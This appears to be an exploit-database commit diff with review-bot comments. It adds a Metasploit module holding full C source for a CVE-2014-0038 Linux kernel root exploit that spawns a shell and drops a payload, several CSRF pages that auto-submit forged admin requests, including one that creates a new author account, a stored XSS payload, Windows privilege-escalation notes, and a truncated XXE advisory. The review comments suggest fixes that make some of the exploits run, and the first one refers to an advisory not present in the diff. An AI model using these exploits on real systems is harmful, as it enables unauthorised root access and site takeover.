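Review bot: the reference numbering does not match the citations: the text says 'A video demonstration is also available [1]', but [1] is the SEARCH-LAB advisory URL (listed twice, the second copy in angle brackets) and the YouTube link is [2]; swap the entries or renumber the citation. The timeline still carries the placeholder '2016.xx.xx: Full disclosure', which should be the actual date now that the advisory is public. The quotation marks in the vendor description and around '.cab' and '/nobody' have come through as ô, ö and Æ, which is what CP1252 smart quotes look like when displayed as CP437, so the file was saved in a Windows code page; re-encoding it as UTF-8 would fix the display in the mirror. Minor: 'Thus and attacker' should read 'Thus an attacker', and '130.000' uses a thousands separator that reads as a decimal point in English.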
354  platforms/linux/local/40503.rb  Executable file
@ -0,0 +1,354 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require "msf/core"

class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking

include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'Linux Kernel 3.13.1 Recvmmsg Privilege Escalation',
'Description' => %q{
This module attempts to exploit CVE-2014-0038, by sending a recvmmsg
system call with a crafted timeout pointer parameter to gain root.
This exploit has offsets for 3 Ubuntu 13 kernels built in:
3.8.0-19-generic (13.04 default)
3.11.0-12-generic (13.10 default)
3.11.0-15-generic (13.10)
This exploit may take up to 13 minutes to run due to a decrementing (1/sec)
pointer which starts at 0xff*3 (765 seconds)
},
'License' => MSF_LICENSE,
'Author' =>
[
'h00die <mike@shorebreaksecurity.com>', # Module
'rebel' # Discovery
],
'DisclosureDate' => 'Feb 2 2014',
'Platform' => [ 'linux'],
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' =>
[
[ 'Auto', { } ]
],
'DefaultTarget' => 0,
'DefaultOptions' => { 'WfsDelay' => 780, 'PrependFork' => true, },
'References' =>
[
[ 'EDB', '31347'],
[ 'EDB', '31346'],
[ 'CVE', '2014-0038'],
[ 'URL', 'https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1453900']
]
))
register_options(
[
OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),
OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])
], self.class)
end

def check
def kernel_vuln?()
os_id = cmd_exec('grep ^ID= /etc/os-release')
if os_id == 'ID=ubuntu'
kernel = Gem::Version.new(cmd_exec('/bin/uname -r'))
case kernel.release.to_s
when '3.11.0'
if kernel == Gem::Version.new('3.11.0-15-generic') || kernel == Gem::Version.new('3.11.0-12-generic')
vprint_good("Kernel #{kernel} is exploitable")
return true
else
print_error("Kernel #{kernel} is NOT vulnerable or NOT exploitable")
return false
end
when '3.8.0'
if kernel == Gem::Version.new('3.8.0-19-generic')
vprint_good("Kernel #{kernel} is exploitable")
return true
else
print_error("Kernel #{kernel} is NOT vulnerable or NOT exploitable")
return false
end
else
print_error("Non-vuln kernel #{kernel}")
return false
end
else
print_error("Unknown OS: #{os_id}")
return false
end
end

if kernel_vuln?()
return CheckCode::Appears
else
return CheckCode::Safe
end
end

def exploit

if check != CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
end


# direct copy of code from exploit-db. I removed a lot of the comments in the title area just to cut down on size

recvmmsg = %q{
/*
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)
CVE-2014-0038 / x32 ABI with recvmmsg
by rebel @ irc.smashthestack.org
-----------------------------------
*/

#define _GNU_SOURCE
#include <netinet/ip.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/utsname.h>

#define __X32_SYSCALL_BIT 0x40000000
#undef __NR_recvmmsg
#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
#define VLEN 1
#define BUFSIZE 200

int port;

struct offset {
char *kernel_version;
unsigned long dest; // net_sysctl_root + 96
unsigned long original_value; // net_ctl_permissions
unsigned long prepare_kernel_cred;
unsigned long commit_creds;
};

struct offset offsets[] = {
{"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10
{"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10
{"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04
{NULL,0,0,0,0}
};

void udp(int b) {
int sockfd;
struct sockaddr_in servaddr,cliaddr;
int s = 0xff+1;

if(fork() == 0) {
while(s > 0) {
fprintf(stderr,"\rbyte %d / 3.. ~%d secs left \b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s));
sleep(1);
s--;
fprintf(stderr,".");
}

sockfd = socket(AF_INET,SOCK_DGRAM,0);
bzero(&servaddr,sizeof(servaddr));
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);
servaddr.sin_port=htons(port);
sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));
exit(0);
}

}

void trigger() {
open("/proc/sys/net/core/somaxconn",O_RDONLY);

if(getuid() != 0) {
fprintf(stderr,"not root, ya blew it!\n");
exit(-1);
}

fprintf(stderr,"w00p w00p!\n");
system("/bin/sh -i");
}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

// thx bliss
static int __attribute__((regparm(3)))
getroot(void *head, void * table)
{
commit_creds(prepare_kernel_cred(0));
return -1;
}

void __attribute__((regparm(3)))
trampoline()
{
asm("mov $getroot, %rax; call *%rax;");
}

int main(void)
{
int sockfd, retval, i;
struct sockaddr_in sa;
struct mmsghdr msgs[VLEN];
struct iovec iovecs[VLEN];
char buf[BUFSIZE];
long mmapped;
struct utsname u;
struct offset *off = NULL;

uname(&u);

for(i=0;offsets[i].kernel_version != NULL;i++) {
if(!strcmp(offsets[i].kernel_version,u.release)) {
off = &offsets[i];
break;
}
}

if(!off) {
fprintf(stderr,"no offsets for this kernel version..\n");
exit(-1);
}

mmapped = (off->original_value & ~(sysconf(_SC_PAGE_SIZE) - 1));
mmapped &= 0x000000ffffffffff;

srand(time(NULL));
port = (rand() % 30000)+1500;

commit_creds = (_commit_creds)off->commit_creds;
prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;

mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);

if(mmapped == -1) {
perror("mmap()");
exit(-1);
}

memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);

memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);

if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {
perror("mprotect()");
exit(-1);
}

sockfd = socket(AF_INET, SOCK_DGRAM, 0);
if (sockfd == -1) {
perror("socket()");
exit(-1);
}

sa.sin_family = AF_INET;
sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
sa.sin_port = htons(port);

if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
perror("bind()");
exit(-1);
}

memset(msgs, 0, sizeof(msgs));

iovecs[0].iov_base = &buf;
iovecs[0].iov_len = BUFSIZE;
msgs[0].msg_hdr.msg_iov = &iovecs[0];
msgs[0].msg_hdr.msg_iovlen = 1;

for(i=0;i < 3 ;i++) {
udp(i);
retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);
if(!retval) {
fprintf(stderr,"\nrecvmmsg() failed\n");
}
}

close(sockfd);
fprintf(stderr,"\n");
trigger();
}
}

filename = rand_text_alphanumeric(8)
executable_path = "#{datastore['WritableDir']}/#(unknown)"
payloadname = rand_text_alphanumeric(8)
payload_path = "#{datastore['WritableDir']}/#{payloadname}"

def has_prereqs?()
gcc = cmd_exec('which gcc')
if gcc.include?('gcc')
vprint_good('gcc is installed')
else
print_error('gcc is not installed. Compiling will fail.')
end
return gcc.include?('gcc')
end

compile = false
if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'
if has_prereqs?()
compile = true
vprint_status('Live compiling exploit on system')
else
vprint_status('Dropping pre-compiled exploit on system')
end
end
if check != CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
end

def upload_and_chmod(fname,fcontent)
print_status "Writing to #{fname} (#{fcontent.size} bytes)"
rm_f fname
write_file(fname, fcontent)
cmd_exec("chmod +x #{fname}")
register_file_for_cleanup(fname)
end

if compile
recvmmsg.gsub!(/system\("\/bin\/sh -i"\);/,
"system(\"#{payload_path}\");")
upload_and_chmod("#{executable_path}.c", recvmmsg)
vprint_status("Compiling #{executable_path}.c")
cmd_exec("gcc -o #{executable_path} #{executable_path}.c") #compile
register_file_for_cleanup(executable_path)
else
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2014-0038', 'recvmmsg')
fd = ::File.open( path, "rb")
recvmmsg = fd.read(fd.stat.size)
fd.close
upload_and_chmod(executable_path, recvmmsg)
# overwrite with the hardcoded variable names in the compiled versions
payload_filename = 'a0RwAacU'
payload_path = "/tmp/#{payload_filename}"
end

upload_and_chmod(payload_path, generate_payload_exe)
stime = Time.now
vprint_status("Exploiting... May take 13min. Start time: #{stime}")
output = cmd_exec(executable_path)
output.each_line { |line| vprint_status(line.chomp) }
end
end
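Review bot: `kernel_vuln?`, `has_prereqs?` and `upload_and_chmod` are declared with nested `def` inside `check` and `exploit`, which redefines them as instance methods every time the enclosing method runs; hoist them to ordinary methods of the class. `check` is also called twice in `exploit` (once at the top, again right after the `COMPILE` handling) with the identical `fail_with`, so the kernel detection and its output run twice; drop the second call. With `COMPILE` set to `True` and no gcc on the target, `has_prereqs?` only prints an error and the module silently falls back to the pre-compiled binary, contradicting the explicit option; `fail_with(Failure::BadConfig, ...)` in that branch would honour the user's choice. The `gcc -o` result is likewise never checked, so a failed compile proceeds to execute a non-existent file.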
94
platforms/php/webapps/40493.html
Executable file
@ -0,0 +1,94 @@
# Exploit Title : Spacemarc News - Cross-Site Request
Forgery ( Add New Post)
# Author : Besim
# Google Dork : -
# Date : 10/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : http://www.spacemarc.it
# Software link :
http://www.hotscripts.com/listings/jump/download/107255


*########################### CSRF PoC ###############################*

<html>
<!-- CSRF PoC -->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://site_name/news/admin/inserisci.php", true);
xhr.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data;boundary=---------------------------7815509202030471153167006625");
xhr.withCredentials = true;
var body ="-----------------------------7815509202030471153167006625\r\n" +
"Content-Disposition: form-data; name=\"titolo\"\r\n" +
"\r\n" +
"MavilerTester\r\n" +
"-----------------------------7815509202030471153167006625\r\n" +
"Content-Disposition: form-data; name=\"im\"\r\n" +
"\r\n" +
"IM\r\n" +
"-----------------------------7815509202030471153167006625\r\n" +
"Content-Disposition: form-data; name=\"size\"\r\n" +
"\r\n" +
"Normale\r\n" +
"-----------------------------7815509202030471153167006625\r\n" +
"Content-Disposition: form-data; name=\"color\"\r\n" +
"\r\n" +
"Color\r\n" +
"-----------------------------7815509202030471153167006625\r\n" +
"Content-Disposition: form-data; name=\"helpbox\"\r\n" +
"\r\n" +
"[u]text[/u]\r\n" +
"-----------------------------7815509202030471153167006625\r\n" +
"Content-Disposition: form-data; name=\"testo\"\r\n" +
"\r\n" +
"tester\r\n" +
"-----------------------------7815509202030471153167006625\r\n" +
"Content-Disposition: form-data; name=\"immagine\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------7815509202030471153167006625\r\n" +
"Content-Disposition: form-data; name=\"userfile\";filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------7815509202030471153167006625\r\n" +
"Content-Disposition: form-data; name=\"letture\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------7815509202030471153167006625\r\n" +
"Content-Disposition: form-data; name=\"categoria\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------7815509202030471153167006625\r\n" +
"Content-Disposition: form-data; name=\"abilita_commenti\"\r\n" +
"\r\n" +
"on\r\n" +
"-----------------------------7815509202030471153167006625\r\n" +
"Content-Disposition: form-data; name=\"notifica_commenti\"\r\n"+
"\r\n" +
"on\r\n" +
"-----------------------------7815509202030471153167006625\r\n" +
"Content-Disposition: form-data; name=\"submit\"\r\n" +
"\r\n" +
"Inserisci\r\n" +
"-----------------------------7815509202030471153167006625--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>

*####################################################################*
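Review bot: the `# Exploit Title` / `# Author` header block sits outside any HTML comment, unlike 40495.html and 40496.html in this same commit which wrap it in `<!-- -->`, so a browser renders it as visible page text; the title is also wrapped mid-phrase (`Cross-Site Request` / `Forgery ( Add New Post)`), as is the `# Software link :` line. Wrap the header in a comment and rejoin the broken lines. The `Content-Type` value passed to `setRequestHeader` omits the space after the semicolon (`multipart/form-data;boundary=`), which is inconsistent with the other PoCs here and worth normalising.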
38
platforms/php/webapps/40495.html
Executable file
@ -0,0 +1,38 @@
<!--
# Exploit Title : *BirdBlog 1.4.0* *- *Cross-Site Request Forgery (*Add New Post*)
# Author : *Besim*
# Google Dork : -
# Date : 11/10/2016
# Type : *webapps*
# Platform : *PHP*
# Software link: http://www.hotscripts.com/listings/jump/download/49011

*########################### CSRF PoC ###############################*
-->

<html>
<!-- CSRF PoC -->
<body>
<form action="http://site_name/path/admin/entries.php?a=post" method="POST">
<input type="hidden" name="title" value="Exploit-DB" />
<input type="hidden" name="category" value="1" />
<input type="hidden" name="music" value="rockrock" />
<input type="hidden" name="mood" value="rock" />
<input type="hidden" name="moodicon" value="1" />
<input type="hidden" name="entry" value="tester" />
<input type="hidden" name="excerpt" value="tester" />
<input type="hidden" name="password" value="" />
<input type="hidden" name="parseurls" value="1" />
<input type="hidden" name="parseemoticons" value="1" />
<input type="hidden" name="parsebbcode" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

<!--
*####################################################################*
-->
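Review bot: the header lines carry stray `*` markers left by a rich-text mail client (`*BirdBlog 1.4.0* *- *Cross-Site Request Forgery (*Add New Post*)`, `*Besim*`, `*webapps*`, `*PHP*`), so the title and metadata do not read as plain text the way the other PoCs in this commit do; strip them. This file also has no `# Vendor Homepage` line where the sibling PoCs provide one.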
|
83
platforms/php/webapps/40496.html
Executable file
83
platforms/php/webapps/40496.html
Executable file
|
@ -0,0 +1,83 @@
<!--
# Exploit Title : PHP Enter 4.2.7 - Cross-Site Request Forgery (Add New Post)
# Author : Besim
# Google Dork : -
# Date : 11/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : http://www.phpenter.net
# Software link : http://www.hotscripts.com/listings/jump/download/150217

########################### CSRF PoC ###############################
-->

<html>
<!-- CSRF PoC -->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://site_name/path/addnews.php", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------4485886114928592041224662482");
xhr.withCredentials = true;
var body = "-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"univer\"\r\n" +
"\r\n" +
"2016074155\r\n" +
"-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"idblog\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"usercc\"\r\n" +
"\r\n" +
"root\r\n" +
"-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"editor\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"badress\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"bname\"\r\n" +
"\r\n" +
"Test\r\n" +
"-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"summary\"\r\n" +
"\r\n" +
"Test\r\n" +
"-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"image\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"main\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"amess\"\r\n" +
"\r\n" +
"\x3cp\x3eTestttt\x3c/p\x3e\r\n" +
"-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"query\"\r\n" +
"\r\n" +
"Submit\r\n" +
"-----------------------------4485886114928592041224662482--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
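Review bot: the request body posts `univer=2016074155` next to `usercc=root` with no explanation of either field; if `univer` is a per-session or per-request token, the forged request only succeeds with that captured value and the CSRF claim should state that (and if it is a static value, say so), and the `usercc` value suggests the request is bound to a particular account name, which should likewise be documented so a reader can judge the real preconditions.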
83
platforms/php/webapps/40496.html
Executable file
@ -0,0 +1,26 @@
# Exploit Title : ApPHP MicroBlog 1.0.2 - Stored Cross
Site Scripting
# Author : Besim
# Google Dork :
# Date : 12/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : -
# Software link : http://www.scriptdungeon.com/jump.php?ScriptID=9162

Description :

Vulnerable link : http://site_name/path/index.php?page=posts&post_id=

Stored XSS Payload ( Comments ): *

# Vulnerable URL :
http://site_name/path/index.php?page=posts&post_id= - Post comment section
# Vuln. Parameter : comment_user_name

############ POST DATA ############

task=publish_comment&article_id=69&user_id=&comment_user_name=<script>alert(7);</script>&comment_user_email=besimweptest@yopmail.com&comment_text=Besim&captcha_code=DKF8&btnSubmitPC=Publish
your comment

############ ######################
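Review bot: the POST data is wrapped so that `btnSubmitPC=Publish` ends one line and `your comment` starts the next; as a form-encoded body that value must be on one line and encoded (`btnSubmitPC=Publish+your+comment`), otherwise the captured request is malformed. The title is split the same way (`Stored Cross` / `Site Scripting`) and `Stored XSS Payload ( Comments ): *` ends in a stray `*`. The request also carries `captcha_code=DKF8`, i.e. the comment form is CAPTCHA-protected, so the description should state that precondition rather than leave it implicit in the body.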
155
platforms/php/webapps/40506.html
Executable file
@ -0,0 +1,155 @@
# Exploit Title : ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)
# Author : Besim
# Google Dork :
# Date : 12/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : -
# Software link : http://www.scriptdungeon.com/jump.php?ScriptID=9162



########################### CSRF PoC ###############################


<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "
http://site_name/path/index.php?admin=authors_management", true);
xhr.setRequestHeader("Accept",
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data;
boundary=---------------------------25472311920733601781889948655");
xhr.withCredentials = true;
var body =
"-----------------------------25472311920733601781889948655\r\n" +
"Content-Disposition: form-data; name=\"mg_action\"\r\n" +
"\r\n" +
"create\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"mg_rid\"\r\n" +
"\r\n" +
"-1\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"mg_sorting_fields\"\r\n"
+
"\r\n" +
"\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"mg_sorting_types\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"mg_page\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"mg_operation\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"mg_operation_type\"\r\n"
+
"\r\n" +
"\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"mg_operation_field\"\r\n"
+
"\r\n" +
"\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"mg_search_status\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"mg_language_id\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"show_about_me\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"account_type\"\r\n" +
"\r\n" +
"author\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"last_login\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"first_name\"\r\n" +
"\r\n" +
"Mehmet\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"last_name\"\r\n" +
"\r\n" +
"mersin\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"email\"\r\n" +
"\r\n" +
"mehmet@yopmail.com\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"user_name\"\r\n" +
"\r\n" +
"Zer0\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"password\"\r\n" +
"\r\n" +
"mehmet\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"avatar\";
filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"about_me\"\r\n" +
"\r\n" +
"denemddendemdendjendk\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"is_active\"\r\n" +
"\r\n" +
"1\r\n" +

"-----------------------------25472311920733601781889948655--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
</script>
<form action="#">
<input type="button" value="Submit request"
onclick="submitRequest();" />
</form>
</body>
</html>

####################################################################
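Review bot: three JavaScript string literals are broken across lines by a mail wrap, which is a syntax error (unterminated string) and means the PoC does not run as committed: `xhr.open("POST", "` continued on the next line by `http://site_name/path/index.php?admin=authors_management", true);`, the `Content-Type` header value split before `boundary=`, and `name=\"avatar\";` split from `filename=\"\"\r\n" +`. Rejoin each onto a single line. The `<input type="button" value="Submit request"` / `onclick="submitRequest();" />` split is harmless HTML, but as in 40493.html the `# Exploit Title` header block sits outside an HTML comment and renders as page text.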
29
platforms/windows/local/40494.txt
Executable file
@ -0,0 +1,29 @@
Minecraft Launcher: https://minecraft.net
Version: 1.6.61
By Ross Marks: http://www.rossmarks.co.uk
Exploit-db: https://www.exploit-db.com/author/?a=8724
Category: Local
Tested on: Windows 10 x86/x64

1) Insecure File Permissions Local Privilege Escalation

Minecraft's launcher (minecraftLauncher.exe) suffers from an elevation of privileges
vulnerability which can be used by a simple user that can change the executable file
with a binary of choice. The vulnerability exist due to the improper permissions,
with the 'F' flag (Full) for 'Users' group, making the entire directory
'Minecraft' and its files and sub-dirs world-writable.

This would allow an attacker the ability to inject code or replace the MinecraftLauncher
executable and have it run in the context of the system.

PoC:

C:\Program Files (x86)\Minecraft>icacls MinecraftLauncher.exe
MinecraftLauncher.exe BUILTIN\Users:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
PENTEST\ross.marks:(I)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APP PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
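Review bot: every ACE in the `icacls` output carries `(I)`, so the Full-control grant to `BUILTIN\Users` is inherited from the `C:\Program Files (x86)\Minecraft` directory rather than set on the file; the PoC should therefore also show `icacls` on the directory itself, since that is the ACL that needs fixing. More importantly, nothing in the advisory shows the launcher being executed by a privileged account, service or scheduled task, so `have it run in the context of the system` needs supporting evidence; a user-writable binary that is only ever executed by that same user is not an elevation of privilege. Minor: `The vulnerability exist` should read `exists`, and the binary is named `minecraftLauncher.exe` in the prose but `MinecraftLauncher.exe` in the output.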
29
platforms/windows/local/40497.txt
Executable file
@ -0,0 +1,29 @@
#########################################################################
# Exploit Title: sheed AntiVirus Unquoted Service Path Privilege Escalation
# Date: 11/10/2016
# Author: Amir.ght
# Vendor Homepage: http://sheedantivirus.ir/
# Software Link:http://dl.sheedantivirus.ir/setup.exe
#version : 2.3 (Latest)
# Tested on: Windows 7
##########################################################################

sheed AntiVirus installs a service with an unquoted service path
To properly exploit this vulnerability,
the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run
with elevated privileges.
-------------------------------------------
C:\>sc qc ShavProt
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ShavProt
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\Sheed AntiVirus\shgrprot.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ShavProt
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
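Review bot: the `sc qc` output does confirm an unquoted `BINARY_PATH_NAME` containing spaces (`C:\Program Files\Sheed AntiVirus\shgrprot.exe`) for a `LocalSystem`, `AUTO_START` service, but exploitability additionally requires that a standard user can write into `C:\` or `C:\Program Files\`, which default Windows ACLs deny; the advisory should include `icacls` output for those directories or state that precondition explicitly so the real risk can be assessed. Minor header issues: `# Software Link:http://...` is missing the space after the colon and `#version : 2.3 (Latest)` does not follow the `# Key: value` form of the surrounding lines.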
140
platforms/xml/webapps/40501.txt
Executable file
@ -0,0 +1,140 @@
|
|||
SEC Consult Vulnerability Lab Security Advisory < 20161011-0 >
|
||||
=======================================================================
|
||||
title: XML External Entity Injection (XXE)
|
||||
product: RSA Enterprise Compromise Assessment Tool (ECAT)
|
||||
vulnerable version: 4.1.0.1
|
||||
fixed version: 4.1.2.0
|
||||
CVE Number: -
|
||||
impact: Medium
|
||||
homepage: https://www.rsa.com
|
||||
found: 2016-04-27
|
||||
by: Samandeep Singh (Office Singapore)
|
||||
SEC Consult Vulnerability Lab
|
||||
|
||||
An integrated part of SEC Consult
|
||||
Bangkok - Berlin - Linz - Montreal - Moscow
|
||||
Singapore - Vienna (HQ) - Vilnius - Zurich
|
||||
|
||||
https://www.sec-consult.com
|
||||
=======================================================================
|
||||
|
||||
Vendor description:
|
||||
-------------------
|
||||
"RSA provides more than 30,000 customers around the world with the essential
|
||||
security capabilities to protect their most valuable assets from cyber threats.
|
||||
With RSA's award-winning products, organizations effectively detect,
|
||||
investigate, and respond to advanced attacks; confirm and manage identities; and
|
||||
ultimately, reduce IP theft, fraud, and cybercrime."
|
||||
|
||||
Source: https://www.rsa.com/en-us/company/about
|
||||
|
||||
|
||||
Business recommendation:
|
||||
------------------------
|
||||
By exploiting the XXE vulnerability, an attacker can get read access to the
|
||||
filesystem of the user's system using RSA ECAT client and thus obtain sensitive
|
||||
information from the system. It is also possible to scan ports of the internal
|
||||
hosts and cause DoS on the affected host.
|
||||
|
||||
SEC Consult recommends not to use the product until a thorough security
|
||||
review has been performed by security professionals and all identified
|
||||
issues have been resolved.
|
||||
|
||||
|
||||
Vulnerability overview/description:
|
||||
-----------------------------------
|
||||
1) XML External Entity Injection
|
||||
The used XML parser is resolving external XML entities which allows attackers
|
||||
to read files and send requests to systems on the internal network (e.g port
|
||||
scanning). The vulnerability can be exploited by tricking the user of
|
||||
the application to import a whitelisting file with malicious XML code.
|
||||
|
||||
|
||||
Proof of concept:
|
||||
-----------------
|
||||
1) XML External Entity Injection (XXE)
|
||||
|
